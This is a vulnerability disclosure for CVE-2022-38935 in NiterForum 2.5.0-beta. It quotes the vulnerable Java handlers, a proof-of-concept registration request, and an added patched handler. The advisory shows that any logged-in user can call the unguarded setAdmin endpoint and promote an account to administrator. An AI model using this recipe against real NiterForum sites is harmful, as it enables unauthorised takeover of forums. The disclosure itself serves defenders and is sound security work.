CVE-2022-38935: There is a vulnerability that can add the administrator account · Issue #25 · yourkevin/NiterForum
An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.
Vulnerability Details
Any registered user
code:
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83:
@ResponseBody // @ResponseBody returns the data as JSON
@RequestMapping(value = "/register", method = RequestMethod.POST)
public Object register(HttpServletRequest request,
                       @RequestParam("name") String name,
                       @RequestParam("password") String password,
                       @RequestParam("type") Integer type,
                       HttpServletResponse response) {
    // type: 1 = phone number, 2 = email address
    ResultDTO resultDTO = (ResultDTO) userService.register(type, name, password);
    if (200 == resultDTO.getCode()) {
        // on success the token is issued directly as a cookie valid for 3 days
        Cookie cookie = cookieUtils.getCookie("token", "" + resultDTO.getData(), 86400 * 3);
        response.addCookie(cookie);
    }
    return resultDTO;
}
Any user can create accounts through this interface.
Response (decoded JWT header and payload):
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
Querying the database confirms the account was added:
Add administrator without authority
At NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136:
@PostMapping("/user2588/setAdmin/id")
@ResponseBody
public Map<String,Object> setQuestionById(HttpServletRequest request,
                                          @RequestParam(name = "id", defaultValue = "0") Long id) {
    UserDTO user = (UserDTO) request.getAttribute("loginUser");
    //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
    // only checks that the caller is logged in; the caller's own group/role is never checked
    if (user == null) {
        throw new CustomizeException(CustomizeErrorCode.NO_LOGIN);
    }
    Map<String,Object> map = new HashMap<>();
    UserAccount userAccount = new UserAccount();
    userAccount.setGroupId(19);
    UserAccountExample userAccountExample = new UserAccountExample();
    userAccountExample.createCriteria().andUserIdEqualTo(id);
    // moves the user with the supplied id into group 19 (administrator)
    if (userAccountMapper.updateByExampleSelective(userAccount, userAccountExample) == 1) {
        map.put("code", 200);
        map.put("message", "恭喜您,设置成功!");
    }
    return map;
}
This interface performs no permission check, so any user can access it once logged in.
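As an added example (not code from the NiterForum repository), the same handler with an authorization check placed before the group update, so that being logged in is no longer enough to promote an account. It assumes that UserDTO exposes getGroupId() and that group id 19, the value the original handler writes, is the administrator group; both are assumptions about the project, and the handler is otherwise a drop-in replacement inside AdminController.

```java
// Added example, not NiterForum's own code.
// Assumptions: group id 19 is the administrator group (the value the original
// handler writes); UserDTO exposes getGroupId(); userAccountMapper and the
// UserAccount / UserAccountExample types behave as in the original snippet.
private static final int ADMIN_GROUP_ID = 19;

// True only when the logged-in caller already belongs to the administrator group.
private static boolean isAdmin(UserDTO user) {
    return user != null && Integer.valueOf(ADMIN_GROUP_ID).equals(user.getGroupId());
}

@PostMapping("/user2588/setAdmin/id")
@ResponseBody
public Map<String, Object> setAdminById(HttpServletRequest request,
                                        @RequestParam(name = "id", defaultValue = "0") Long id) {
    UserDTO user = (UserDTO) request.getAttribute("loginUser");
    if (user == null) {
        throw new CustomizeException(CustomizeErrorCode.NO_LOGIN);
    }
    Map<String, Object> map = new HashMap<>();
    // Authorization check the original handler lacks: authentication (being
    // logged in) is not the same as being permitted to promote accounts.
    if (!isAdmin(user)) {
        map.put("code", 403);
        map.put("message", "forbidden");
        return map;
    }
    // Reject the defaultValue of 0 and any other non-positive id instead of
    // silently running an update that matches no row.
    if (id == null || id <= 0) {
        map.put("code", 400);
        map.put("message", "invalid user id");
        return map;
    }
    UserAccount userAccount = new UserAccount();
    userAccount.setGroupId(ADMIN_GROUP_ID);
    UserAccountExample example = new UserAccountExample();
    example.createCriteria().andUserIdEqualTo(id);
    if (userAccountMapper.updateByExampleSelective(userAccount, example) == 1) {
        map.put("code", 200);
        map.put("message", "恭喜您,设置成功!");
    }
    return map;
}
```

Denied calls (the 403 branch) are worth logging together with the caller's user id, since a non-administrator reaching this endpoint is a direct signal of an attempted privilege escalation.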
POC:
Any registered user
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
[email protected]&password=123456&type=2
Add administrator without authority